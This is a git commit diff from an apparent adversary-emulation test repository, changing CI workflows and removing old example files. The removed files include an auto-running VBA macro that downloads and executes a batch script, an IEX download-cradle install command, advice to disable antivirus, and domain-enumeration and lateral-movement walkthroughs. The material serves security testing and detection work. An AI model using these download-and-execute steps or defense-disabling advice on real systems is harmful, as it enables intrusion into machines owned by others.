fix attack navigator version

Co-authored-by: kali <kali@kali-hp.kali>
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
Co-authored-by: Hare Sudhan <27735081+cyberbuff@users.noreply.github.com>

.circleci/config.yml

@@ -1,84 +0,0 @@
-version: 2
-
-defaults: &defaults
-  docker:
-    - image: circleci/ruby:2.4
-
-workflows:
-  version: 2
-  validate:
-    jobs:
-      - validate_atomics
-
-  generate-guids-and-docs:
-    jobs:
-      - generate_and_commit_guids_and_docs:
-          filters:
-            branches:
-              only: master
-
-jobs:
-  validate_atomics:
-    <<: *defaults
-    steps:
-      - checkout
-      - add_ssh_keys
-
-      - run:
-          name: Validate the format of atomic tests against the spec
-          command: |
-            bin/validate-atomics.rb
-
-  generate_and_commit_guids_and_docs:
-    <<: *defaults
-    steps:
-      - checkout
-      - add_ssh_keys
-
-      - run:
-          name: Generate and commit unique GUIDs for each atomic test
-          command: |
-            bin/generate-guids.rb
-
-            echo ""
-            echo ""
-            git status
-            echo ""
-            echo ""
-            git diff-index HEAD --
-
-            if git diff-index --quiet HEAD -- ; then
-              echo "Not committing GUID changes because there are no changes"
-            else
-              git config credential.helper 'cache --timeout=120'
-              git config user.email "<email>"
-              git config user.name "CircleCI Atomic Red Team GUID generator"
-
-              git add atomics
-              git commit -am "Generate GUIDs from job=$CIRCLE_JOB branch=$CIRCLE_BRANCH [skip ci]"
-              git push -u origin $CIRCLE_BRANCH
-            fi
-
-      - run:
-          name: Generate and commit nice markdown documents for atomics
-          command: |
-            bin/generate-atomic-docs.rb
-
-            echo ""
-            echo ""
-            git status
-            echo ""
-            echo ""
-            git diff-index HEAD --
-
-            if git diff-index --quiet HEAD -- ; then
-              echo "Not committing documentation because there are no changes"
-            else
-              git config credential.helper 'cache --timeout=120'
-              git config user.email "<email>"
-              git config user.name "CircleCI Atomic Red Team doc generator"
-
-              git add atomics
-              git commit -am "Generate docs from job=$CIRCLE_JOB branch=$CIRCLE_BRANCH [skip ci]"
-              git push -u origin $CIRCLE_BRANCH
-            fi

.devcontainer/devcontainer.json

@@ -0,0 +1,26 @@
+{
+  "image": "mcr.microsoft.com/devcontainers/universal:2",
+  "features": {
+    "ghcr.io/devcontainers/features/powershell:1": {},
+    "ghcr.io/natescherer/devcontainers-custom-features/powershell-resources:1": {
+      "resources": "powershell-yaml,invoke-atomicredteam"
+    }
+  },
+  "remoteUser": "root",
+  "onCreateCommand": "pwsh /workspaces/atomic-red-team/.devcontainer/setup.ps1",
+  "customizations": {
+    "vscode": {
+      "extensions": [
+        "ms-vscode.powershell"
+      ],
+      "settings": {
+        "terminal.integrated.defaultProfile.linux": "pwsh",
+        "terminal.integrated.profiles.linux": {
+          "pwsh": {
+            "path": "/usr/bin/pwsh"
+          }
+        }
+      }
+    }
+  }
+}

.devcontainer/setup.ps1

@@ -0,0 +1,7 @@
+New-Item $PROFILE -Force
+Set-Variable -Name "InvokePath" -Value (Get-Item /usr/local/share/powershell/Modules/Invoke-AtomicRedTeam/**/Invoke-AtomicRedTeam.psd1).FullName
+Write-Output @"
+Import-Module $InvokePath -Force
+`$PSDefaultParameterValues`["Invoke-AtomicTest:PathToAtomicsFolder"] = "/workspaces/atomic-red-team/atomics";
+`$PSDefaultParameterValues`["Invoke-AtomicTest:ExecutionLogPath"]="$HOME/AtomicRedTeam/execution.csv";
+"@ > $PROFILE

.github/ISSUE_TEMPLATE/new_atomic.md

@@ -8,12 +8,12 @@ assignees: ''
 ---
 
 <!--
-For reference, check out this article that explains how to properly submit a new atomic test: https://atomicredteam.io/contributing#how-to-contribute.
+For reference, check out this article that explains how to properly submit a new atomic test: https://www.atomicredteam.io/atomic-red-team/docs/designing-atomic-tests.
 -->
 
 ### Technique ID: TXXXX
 
 ### Additional Details
 <!--
-Anything you'd like to share or explain that isn't represented in the contents of the YAML-based test definition. 
+Anything you'd like to share or explain that isn't represented in the contents of the YAML-based test definition.
 -->

.github/dependabot.yml

@@ -0,0 +1,16 @@
+# To get started with Dependabot version updates, you'll need to specify which
+# package ecosystems to update and where the package manifests are located.
+# Please see the documentation for all configuration options:
+# https://docs.github.com/github/administering-a-repository/configuration-options-for-dependency-updates
+
+version: 2
+updates:
+  - package-ecosystem: "pip" # See documentation for possible values
+    directory: "/" # Location of package manifests
+    schedule:
+      interval: "weekly"
+  # Maintain dependencies for GitHub Actions
+  - package-ecosystem: "github-actions"
+    directory: "/"
+    schedule:
+      interval: "weekly"

.github/workflows/assign-labels.yml

@@ -0,0 +1,59 @@
+name: assign-labels
+
+on:
+  workflow_run:
+    workflows: ["validate-atomics"]
+    types:
+      - completed
+
+jobs:
+  assign-labels:
+    runs-on: ubuntu-latest
+    steps:
+      - name: download-artifact
+        uses: actions/github-script@v8
+        with:
+          script: |
+            let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
+               owner: context.repo.owner,
+               repo: context.repo.repo,
+               run_id: context.payload.workflow_run.id,
+            });
+            let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => {
+              return artifact.name == "labels.json"
+            })[0];
+            let download = await github.rest.actions.downloadArtifact({
+               owner: context.repo.owner,
+               repo: context.repo.repo,
+               artifact_id: matchArtifact.id,
+               archive_format: 'zip',
+            });
+            let fs = require('fs');
+            fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/labels.zip`, Buffer.from(download.data));
+
+      - name: unzip-artifact
+        run: unzip labels.zip
+
+      - name: assign-labels-and-reviewers
+        uses: actions/github-script@v8
+        with:
+          script: |
+            let fs = require('fs');
+            const obj = JSON.parse(fs.readFileSync('./labels.json'));
+            console.log(obj)
+            if(obj.labels.length > 0){
+              await github.rest.issues.addLabels({
+                issue_number: obj.pr,
+                owner: context.repo.owner,
+                repo: context.repo.repo,
+                labels: obj.labels
+               })
+            }
+            if(obj.maintainers.length > 0){
+              await github.rest.issues.addAssignees({
+                issue_number: obj.pr,
+                owner: context.repo.owner,
+                repo: context.repo.repo,
+                assignees: obj.maintainers
+              });
+            }

.github/workflows/generate-docs.yml

@@ -0,0 +1,69 @@
+name: generate-docs
+on:
+  push:
+    branches: [ "master" ]
+
+jobs:
+  generate-docs:
+    runs-on: ubuntu-latest
+    steps:
+      - name: checkout repo
+        uses: actions/checkout@v6
+        with:
+          token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
+
+      - name: Install poetry
+        run: pipx install poetry
+      - uses: actions/setup-python@v6
+        with:
+          python-version: "3.11.2"
+          cache: "poetry"
+      - name: Install dependencies
+        run: poetry install --no-interaction
+
+      - name: Generate shields.io URL
+        run: poetry run python runner.py generate-counter
+        id: counter
+        working-directory: atomic_red_team
+        env:
+          PYTHONPATH: ${{ github.workspace }}
+
+      - name: Update README
+        run: |
+          echo ${{ steps.counter.outputs.result }}
+          sed -i "s|https://img.shields.io/badge/Atomics-.*-flat.svg|${{ steps.counter.outputs.result }}|" README.md
+        shell: bash
+
+      - name: Generate and commit unique GUIDs for each atomic test
+        run: poetry run python runner.py generate-guids
+        working-directory: atomic_red_team
+        env:
+          PYTHONPATH: ${{ github.workspace }}
+
+      - name: setup ruby
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: 3.0
+          bundler-cache: true
+
+      - name: generate markdown docs for atomics
+        run: |
+          bin/generate-atomic-docs.rb
+          echo ""
+          echo ""
+          git status
+          echo ""
+          echo ""
+          git diff-index HEAD --
+
+          if git diff-index --quiet HEAD -- ; then
+            echo "Not committing documentation because there are no changes"
+          else
+            git config credential.helper 'cache --timeout=120'
+            git config user.email "opensource@redcanary.com"
+            git config user.name "Atomic Red Team doc generator"
+            git add README.md
+            git add atomics
+            git commit -am "Generated docs from job=$GITHUB_JOB branch=$GITHUB_REF_NAME [ci skip]"
+            git push origin $GITHUB_REF_NAME -f
+          fi

.github/workflows/run-python-tests.yml

@@ -0,0 +1,29 @@
+name: validate-python-file-changes
+
+on:
+  pull_request:
+    branches:
+      - master
+    paths:
+      - "atomic_red_team/**/*.py"
+
+jobs:
+  validate-python-file-changes:
+    runs-on: macos-latest
+    steps:
+      - name: checkout repo
+        uses: actions/checkout@v6
+      - name: Install poetry
+        run: pipx install poetry
+      - name: setup python3.11
+        uses: actions/setup-python@v6
+        id: setup-python
+        with:
+          python-version: "3.12.4"
+          cache: "poetry"
+
+      - name: Install dependencies
+        run: poetry install --no-interaction
+
+      - name: Run pytest
+        run: poetry run pytest atomic_red_team/tests

.github/workflows/stale.yml

@@ -0,0 +1,19 @@
+name: 'Close stale issues and PRs'
+on:
+  schedule:
+    - cron: '30 1 * * *'
+
+jobs:
+  stale:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/stale@v10
+        with:
+          stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
+          stale-pr-message: 'This PR is stale because it has been open 45 days with no activity. Remove stale label or comment or this will be closed in 10 days.'
+          close-issue-message: 'This issue was closed because it has been stalled for 5 days with no activity.'
+          close-pr-message: 'This PR was closed because it has been stalled for 10 days with no activity.'
+          days-before-issue-stale: 30
+          days-before-pr-stale: 45
+          days-before-issue-close: 10
+          days-before-pr-close: 10

.github/workflows/validate-atomics.yml

@@ -0,0 +1,75 @@
+name: validate-atomics
+
+on:
+  pull_request:
+    branches:
+      - master
+
+jobs:
+  validate-atomics:
+    runs-on: ubuntu-latest
+    steps:
+      - name: checkout repo
+        uses: actions/checkout@v6
+      - name: Install poetry
+        run: pipx install poetry
+      - name: setup python3.11
+        uses: actions/setup-python@v6
+        id: setup-python
+        with:
+          python-version: "3.11.2"
+          cache: "poetry"
+
+      - name: Install dependencies
+        run: poetry install --no-interaction
+
+      - name: validate the format of atomics tests against the spec
+        run: poetry run python runner.py validate
+        working-directory: atomic_red_team
+        env:
+          PYTHONPATH: ${{ github.workspace }}
+
+  upload:
+    runs-on: ubuntu-latest
+    steps:
+      - name: checkout repo
+        uses: actions/checkout@v6
+      - name: Install poetry
+        run: pipx install poetry
+      - name: setup python3.11
+        uses: actions/setup-python@v6
+        id: setup-python
+        with:
+          python-version: "3.11.2"
+          cache: "poetry"
+      - uses: actions/github-script@v8
+        id: get_pr_number
+        with:
+          script: |
+            if (context.issue.number) {
+              // Return issue number if present
+              return context.issue.number;
+            } else {
+              // Otherwise return issue number from commit
+              return (
+                await github.rest.repos.listPullRequestsAssociatedWithCommit({
+                  commit_sha: context.sha,
+                  owner: context.repo.owner,
+                  repo: context.repo.repo,
+                })
+              ).data[0].number;
+            }
+          result-encoding: string
+      - name: Install dependencies
+        run: poetry install --no-interaction --no-root
+      - name: save labels and reviewers into a file.
+        run: |
+          poetry run python runner.py generate-labels --pr '${{steps.get_pr_number.outputs.result}}' --token ${{ secrets.GITHUB_TOKEN }}
+        working-directory: atomic_red_team
+        env:
+          PYTHONPATH: ${{ github.workspace }}
+
+      - uses: actions/upload-artifact@v7
+        with:
+          name: labels.json
+          path: atomic_red_team/pr/

.github/workflows/validate-terraform.yml

@@ -0,0 +1,20 @@
+name: validate-terraform
+
+on:
+  pull_request:
+    branches:
+      - master
+    paths:
+      - "**/*.tf"
+
+jobs:
+  validate-terraform:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v6
+      - uses: hashicorp/setup-terraform@v4
+
+      - name: Terraform fmt
+        id: fmt
+        run: terraform fmt -recursive -check
+        continue-on-error: false

.gitignore

@@ -24,3 +24,129 @@ docs/.sass-cache/
 docs/_site/
 **/Invoke-AtomicTest-ExecutionLog.csv
 techniques_hash.db
+
+# Credential files
+*.creds
+
+# Local .terraform directories
+**/.terraform/*
+
+# .tfstate files
+*.tfstate
+*.tfstate.*
+**/*.terraform.lock.hcl
+
+# Crash log files
+crash.log
+crash.*.log
+
+# Ignore override files as they are usually used to override resources locally and so
+# are not checked in
+override.tf
+override.tf.json
+*_override.tf
+*_override.tf.json
+
+# Include override files you do wish to add to version control using negated pattern
+# !example_override.tf
+
+# Include tfplan files to ignore the plan output of command: terraform plan -out=tfplan
+# example: *tfplan*
+
+# Ignore CLI configuration files
+.terraformrc
+terraform.rc
+
+*.pyc
+
+# The ExternalPayloads folder
+ExternalPayloads
+
+# Visual Studio 2015/2017 cache/options directory
+.vs/
+
+# .NET Core
+project.lock.json
+project.fragment.lock.json
+artifacts/
+
+# ASP.NET Scaffolding
+ScaffoldingReadMe.txt
+
+# StyleCop
+StyleCopReport.xml
+
+# Files built by Visual Studio
+*_i.c
+*_p.c
+*_h.h
+*.ilk
+*.meta
+*.obj
+*.iobj
+*.pch
+*.pdb
+*.ipdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*_wpftmp.csproj
+*.log
+*.tlog
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opendb
+*.opensdf
+*.sdf
+*.cachefile
+*.VC.db
+*.VC.VC.opendb
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# Visual Studio Trace Files
+*.e2e
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!?*.[Cc]ache/
+
+# Others
+ClientBin/
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.jfm
+*.pfx
+*.publishsettings
+orleans.codegen.cs
+
+# Node.js
+node_modules/
+
+# Python
+__pycache__/
+*.pyc
+.hypothesis/

ARTifacts/Adversary/Dragons_Tail/DragonsTail.vba

@@ -1,48 +0,0 @@
-' Save Document As Single Web Page .mht
-' Rename Document As .Doc
-' This Document is modeled after FireEye's report on APT32
-' Special Thanks to Nick Carr for his work on this write-up
-' https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
-
-Sub AutoOpen()
-
-Dim myURL As String
-Dim myPath As String
-
-
-If (MsgBox("You're Are About To Execute the ATOMIC Test for Dragon's Tail, You sure?", 1, vbMsgBoxSetForeground) = 2) Then
-     End ' This Ends Macro
-End If
-
-' Downloads Dragon's Tail Chain Reaction Script
-myURL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat"
-
-Dim WinHttpReq As Object
-Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
-WinHttpReq.Open "GET", myURL, False, "username", "password"
-WinHttpReq.send
-
-myURL = WinHttpReq.responseBody
-If WinHttpReq.Status = 200 Then
-    Set oStream = CreateObject("ADODB.Stream")
-    oStream.Open
-    oStream.Type = 1
-    oStream.Write WinHttpReq.responseBody
-
-    Dim fso As Object
-    Const FLDR_NAME As String = "C:\Tools\"
-
-    Set fso = CreateObject("Scripting.FileSystemObject")
-
-    If Not fso.FolderExists(FLDR_NAME) Then
-        fso.CreateFolder (FLDR_NAME)
-    End If
-
-    ' Change Path HERE
-    oStream.SaveToFile "C:\Tools\NothingToSeeHere.bat", 2  ' 1 = no overwrite, 2 = overwrite
-    ' EXECUTE FROM PATH
-    Shell "cmd.exe /c C:\Tools\NothingToSeeHere.bat"
-    oStream.Close
-End If
-
-End Sub

ARTifacts/Adversary/Dragons_Tail/README.md

@@ -1,2 +0,0 @@
-### Group: Dragon's Tail
-[Modeled After G0050](https://attack.mitre.org/wiki/Group/G0050)

ARTifacts/Atomic_Friday/2020-05-01/Atomic_Friday.md

@@ -1,155 +0,0 @@
-# Atomic Friday - 05-01-2020
-
-## Setup
-
-My environment today is built with DetectionLab.
-
->This lab has been designed with defenders in mind. Its primary purpose is to allow the user to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations. It can easily be modified to fit most needs or expanded to include additional hosts.
-
-
-Get it here:
-https://github.com/clong/DetectionLab
-
-Follow: [@DetectionLab](https://twitter.com/DetectionLab)
-
-
-<img src="https://github.com/clong/DetectionLab/raw/master/img/DetectionLab.png" alt="DetectionLab" width="200"/>
-
-
-We will be working from WIN10 system.
-
-`$PSVersionTable`
-```
-Name                           Value
-----                           -----
-PSVersion                      5.1.18362.1
-PSEdition                      Desktop
-PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0...}
-BuildVersion                   10.0.18362.1
-CLRVersion                     4.0.30319.42000
-...
-```
-
-## Get Invoke-AtomicRedTeam
-
-<img src="https://www.redcanary.com/wp-content/uploads/image2-25.png" alt="Atomic" width="200"/>
-
-https://github.com/redcanaryco/invoke-atomicredteam
-
-```
-IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1')
-Install-AtomicRedTeam -getAtomics
-```
-This will install `invoke-atomicredteam` and download `Atomics` folder from Atomic Red Team.
-
-Note: 
-- `Set-ExecutionPolicy -Scope CurrentUser unrestricted`
-- `set-executionpolicy unrestricted`
-- Disable AV. 
-
-Atomics folder:
-https://github.com/redcanaryco/atomic-red-team/tree/master/atomics
-
-## Before Update
-
-We're going to modify T1086 - BloodHound
-
-https://github.com/redcanaryco/atomic-red-team/tree/23620c707ac1ed89e4207a39488f9214cf3c6e1e/atomics/T1086
-
-## After Update
-
-SharpHound PR
-- https://github.com/redcanaryco/atomic-red-team/pull/955
-- https://github.com/redcanaryco/atomic-red-team/pull/962
-- Added src dir (removed payloads)
-- Added input arguments
-- Added prereqs
-
-
-SharpHound ingestor: 
-https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1
-
-
-## Local Execution
-
-`Invoke-AtomicTest T1086 -ShowDetailsBrief`
-
-```
-PathToAtomicsFolder = C:\AtomicRedTeam\atomics
-
-T1086-1 Mimikatz
-T1086-2 Run BloodHound from local disk
-T1086-3 Run Bloodhound from Memory using Download Cradle
-```
-
-Select test and show details:
-
-`Invoke-AtomicTest T1086 -TestNumbers 2 -ShowDetails`
-
-Check Prerequisits:
-
-`Invoke-AtomicTest T1086 -TestNumbers 2 -CheckPrereqs`
-
-```
-CheckPrereq's for: T1086-2 Run BloodHound from local disk
-Prerequisites not met: T1086-2 Run BloodHound from local disk
-        [*] SharpHound.ps1 must be located at C:\AtomicRedTeam\atomics\T1086\src
-
-Try installing prereq's with the -GetPrereqs switch
-```
-
-Get Prerequisits:
-
-`Invoke-AtomicTest T1086 -TestNumbers 2 -GetPrereqs`
-
-```
-GetPrereq's for: T1086-2 Run BloodHound from local disk
-Attempting to satisfy prereq: SharpHound.ps1 must be located at C:\AtomicRedTeam\atomics\T1086\src
-Prereq successfully met: SharpHound.ps1 must be located at C:\AtomicRedTeam\atomics\T1086\src
-```
-
-Execute:
-
-`Invoke-AtomicTest T1086 -TestNumbers 2`
-
-```
-Import and Execution of SharpHound.ps1 from C:\AtomicRedTeam\atomics\T1086\src
------------------------------------------------
-Initializing SharpHound at 4:31 PM on 4/30/2020
------------------------------------------------
-
-Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
-
-[+] Creating Schema map for domain WINDOMAIN.LOCAL using path CN=Schema,CN=Configuration,DC=WINDOMAIN,DC=LOCAL
-[+] Cache File not Found: 0 Objects in cache
-
-[+] Pre-populating Domain Controller SIDS
-Status: 0 objects finished (+0) -- Using 81 MB RAM
-Status: 71 objects finished (+71 ∞)/s -- Using 86 MB RAM
-Enumeration finished in 00:00:00.6317770
-Compressing data to C:\Users\VAGRAN~1.WIN\AppData\Local\Temp\20200430163109_BloodHound.zip
-You can upload this file directly to the UI
-
-SharpHound Enumeration Completed at 4:31 PM on 4/30/2020! Happy Graphing!
-
-Done executing test: T1086-2 Run BloodHound from local disk
-```
-
-Where are my reports!?
-
-`-OutputDirectory $env:Temp`
-
-`ls $env:Temp`
-
-`20200430163109_BloodHound.zip`
-
-Time to cleanup
-
-`Invoke-AtomicTest T1086 -TestNumbers 2 -Cleanup`
-
-```
-Command (with inputs):
-Remove-Item C:\AtomicRedTeam\atomics\T1086\src\SharpHound.ps1 -Force -ErrorAction Ignore
-Remove-Item $env:Temp\*BloodHound.zip -Force
-```
-

ARTifacts/Atomic_Friday/2020-05-01/BuildAtomicTest_ps1

@@ -1,56 +0,0 @@
-Import-Module /Users/matt.graeber/Documents/GitHub/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1
-
-# Explore the functions exposed in invoke-atomicredteam
-Get-Command -Module Invoke-AtomicRedTeam
-
-# Path to the 
-$AtomicPath = '/Users/matt.graeber/Documents/GitHub/atomic-red-team/atomics/T1086/T1086.yaml'
-
-# Get the raw YAML
-$T1086 = Get-Content -Path $AtomicPath -Raw
-
-# Parse the YAML, validate against expected atomic technique/test schema and output appropriate PowerShell object.
-$AtomicTechnique = Get-AtomicTechnique -Path $AtomicPath
-
-# Validate all atomics
-Get-ChildItem -Path /Users/matt.graeber/Documents/GitHub/atomic-red-team/atomics/ -Recurse -Include 'T*.yaml' | Get-AtomicTechnique
-
-# Recreate T1086 test #2
-
-$InputArg1 = New-AtomicTestInputArgument -Name internal_domain -Description 'Specify internal domain name to analyze' -Type String -Default 'windomain.local'
-$InputArg2 = New-AtomicTestInputArgument -Name file_path -Description 'File path for SharpHound payload' -Type String -Default 'PathToAtomicsFolder\T1086\src'
-
-$DependencyArgs = @{
-    Description = 'Validate if SharpHound.ps1 is located in #{file_path}.'
-    PrereqCommand = 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1}'
-    GetPrereqCommand = 'Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1"'
-}
-
-$Dependency = New-AtomicTestDependency @DependencyArgs
-
-$TestArgs = @{
-    Name = 'Run BloodHound from local disk'
-    Description = @'
-Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.
-
-Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file.
-'@
-    SupportedPlatforms = 'Windows'
-    ExecutorType = 'PowerShell'
-    ExecutorCommand = @'
-write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
-import-module #{file_path}\SharpHound.ps1; invoke-bloodhound -domain -OutputDirectory #{output_path}    
-'@
-    ExecutorCleanupCommand = @'
-Remove-Item #{file_path}\SharpHound.ps1 -Force
-Remove-Item #{file_path}\*BloodHound.zip -Force  
-'@
-    InputArguments = $InputArg1, $InputArg2
-    DependencyExecutorType = 'PowerShell'
-    Dependencies = $Dependency
-}
-
-$AtomicTest = New-AtomicTest @TestArgs
-
-# Convert the atomic test to raw YAML. Add to existing technique. Profit
-$AtomicTest | ConvertTo-Yaml

ARTifacts/Atomic_Friday/2020-05-01/Getting_Lateral.md

@@ -1,59 +0,0 @@
-# Getting Lateral
-
-Using DetectionLab, we will enable [PSRemoting](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7) on our remote host WEF and execute our Atomic Test on it.
-
-## Setup
-
-On WEF
-
-```
-Enable-PSRemoting
-```
-
-On Win10
-
-Same terminal we used earlier:
-
-`$sess = New-PSSession -ComputerName wef -Credential windomain.local\administrator`
-
-Prompt for credentials
-
-## Let's get Remote (execution)
-
-Wiki - https://github.com/redcanaryco/invoke-atomicredteam/wiki/Execute-Atomic-Tests-(Remote)
-
-After you have established the PS session ($sess) you can proceed with test execution as follows.
-
-`Invoke-AtomicTest T1117 -TestNumbers 2 -ShowDetails`
-
-`Invoke-AtomicTest T1003 -TestNumbers 4 -ShowDetails`
-
-### Install any required prerequisites on the remote machine before test execution
-
-`Invoke-AtomicTest T1117 -Session $sess -GetPrereqs`
-
-### execute all atomic tests in technique T1117|T1003 on a remote machine
-
-`Invoke-AtomicTest T1117 -Session $sess -TestNumbers 2`
-
-`Invoke-AtomicTest T1003 -TestNumbers 4 -Session $sess`
-
-## Validate execution
-
-[T1117 Splunk](https://192.168.38.105:8000/en-US/app/search/search?q=search%20host%3Dwef*%20regsvr32.exe%20earliest%3D-30m%20latest%3Dnow&display.page.search.mode=smart&dispatch.sample_ratio=1&workload_pool=&earliest=-24h%40h&latest=now&sid=1588276958.707)
-
-[T1003 Splunk](https://192.168.38.105:8000/en-US/app/search/search?q=search%20host%3Dwef*%20reg.exe%20earliest%3D-30m%20latest%3Dnow%20%7C%20stats%20values(Process_Command_Line)&display.page.search.mode=smart&dispatch.sample_ratio=1&workload_pool=&earliest=-24h%40h&latest=now&sid=1588277661.75&display.page.search.tab=statistics&display.general.type=statistics)
-
-
-## Random Tips
-
-- Add user to "Remote management Users" group.
-
-- Enabling PowerShell remoting on client versions of Windows when the computer is on a public network is normally disallowed, but you can skip this restriction by using the SkipNetworkProfileCheck parameter. For more information, see the description of the SkipNetworkProfileCheck parameter.
-
-- psremoting to a Windows Server will require an Administrator account (I used Administrator above, as example shown)
-
-
-## Reference
-
-- PSRemoting - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7 

ARTifacts/Atomic_Friday/2020-06-05/Atomic_Friday.md

@@ -1,112 +0,0 @@
-# Atomic Friday - 06-05-2020
-
-Detection Engineering Philosophy in a nutshell
-
-- https://twitter.com/mattifestation/status/1263416936517468167?s=20
-
-Additional References:
-- https://posts.specterops.io/detection-spectrum-198a0bfb9302
-- https://posts.specterops.io/detection-in-depth-a2392b3a7e94
-
-## Do it live
-
-What data do I have?
-
-```
-| metadata type=sourcetypes index=botsv3 | eval firstTime=strftime(firstTime,"%Y-%m-%d %H:%M:%S") | eval lastTime=strftime(lastTime,"%Y-%m-%d %H:%M:%S") | eval recentTime=strftime(recentTime,"%Y-%m-%d %H:%M:%S") | sort - totalCount
-```
-
-Stats
-Endpoint count
-- `(index="botsv3" OR index="botsv2") |  stats values(ComputerName)`
-
-Event types
-- `(index="botsv3" OR index="botsv2")  |  stats values(type)`
-
-
-```
-(index="botsv3" OR index="botsv2") powershell.exe source="WinEventLog:Microsoft-Windows-Sysmon/Operational" | stats values(CommandLine) by Computer
-```
-
-
-## Technique: Scheduled Tasks
-- MITRE [T1053](https://attack.mitre.org/techniques/T1053/)
-- Atomic Red Team [T1053](https://github.com/redcanaryco/atomic-red-team/blob/7d07686f600c0fb3bba468c987eb4e4faea83fa9/atomics/T1053/T1053.md)
-
-Find all Schtasks:
-
-`(index="botsv3" OR index="botsv2") schtasks.exe`
-
-What data sources did we receive?
-
-
-### Now let's see all the CommandLine?
-
-`(index="botsv3" OR index="botsv2") schtasks.exe | stats values(CommandLine)`
-
-`(index="botsv3" OR index="botsv2") schtasks.exe | stats values(CommandLine) by Computer`
-
-`(index="botsv3" OR index="botsv2") schtasks.exe | stats values(CommandLine) by host`
-
-### Change source (WinEventLog:Security)
-
-`(index="botsv3") source="WinEventLog:Security"  schtasks.exe | stats values(Process_Command_Line) by  Creator_Process_Name`
-
-
-`(index="botsv2") source="WinEventLog:Security"  schtasks.exe | stats values(Process_Command_Line) by ComputerName`
-
-### What created this?
-
-`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe | stats values(Image) by ParentImage`
-
-`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe ParentImage=*\\powershell.exe| stats values(Image) by ParentImage ParentCommandLine`
-
-### Begin Tuning Schtasks Search
-
-`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe CommandLine=*powershell.exe*| stats values(CommandLine) by Computer`
-
-`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe CommandLine!="*\Office Automatic Updates*" CommandLine!="*\Office ClickToRun*" | stats values(CommandLine) by Computer`
-
-but - because we know what we want to fire on - 
-
-We can target:
-- `*frombase64string*`
-- `http*`
-- `powershell*`
-
-I want to alert on each time someone creates a task:
-
-`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe CommandLine=*Create* ParentImage!=*\\OfficeClicktoRun.exe | stats values(CommandLine) by Computer`
-
-There is a whole list of things we target. But, first gathering scheduled tasks in a report helps us identify a baseline.
-
-### Saved Reports
-
-`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe CommandLine=*Create* ParentImage!=*\\OfficeClicktoRun.exe | stats values(CommandLine) by Computer`
-
-### Prep for alert:
-
-`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe | table Computer, User, CommandLine, _time`
-
-`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe CommandLine=*Create* ParentImage!=*\\OfficeClicktoRun.exe | table Computer, User, CommandLine, _time`
-
-## Technique: Powershell
-
-Sometimes we may not see the whole picture looking at process command line (Sysmon). What if we had Powershell transactions logs?
-
-`(index="botsv3" OR index="botsv2") powershell.exe source="WinEventLog:Microsoft-Windows-PowerShell/Operational"`
-
-Sysmon - 
-
-`(index="botsv3" OR index="botsv2") powershell.exe source="WinEventLog:Microsoft-Windows-Sysmon/Operational" | stats values(CommandLine) by Computer`
-
-### Alerts
-
-Email alerts:
-
-Save “Saved Search” with (or change) for a “clean” alert:
-
-`| table Computer, User, CommandLine, _time`
-
-Recommend throttling each alert by current estimated time to remediation.
-Ex - Throttle 3 days

ARTifacts/Atomic_Friday/README.md

@@ -1 +0,0 @@
-Notes, resources, and errata related to Atomic Friday events. 

ARTifacts/Chain_Reactions/README.md

@@ -1 +0,0 @@
-# Chain Reactions

